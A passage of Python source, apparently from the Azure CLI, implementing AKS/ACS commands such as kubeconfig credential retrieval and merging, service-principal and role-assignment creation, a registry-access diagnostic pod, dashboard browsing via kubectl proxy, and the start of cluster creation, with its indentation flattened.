:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
_, browse_path = tempfile.mkstemp()
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
kubectl_minor_version = int(kubectl_version["clientVersion"]["minor"])
kubectl_server_minor_version = int(kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to '
'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for'
'more information.')
except subprocess.CalledProcessError as err:
raise ValidationError("Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
]
# Support kubectl versons < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
)
except subprocess.CalledProcessError as err:
raise CLIError("Failed to check the ACR: {}".format(err))
if output:
print(output)
else:
raise CLIError("Failed to check the ACR.")
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
cmd.cli_ctx.cloud.endpoints.portal + # Azure Portal URL (https://portal.azure.com for public cloud)
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning('To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False,
yes=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError('Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
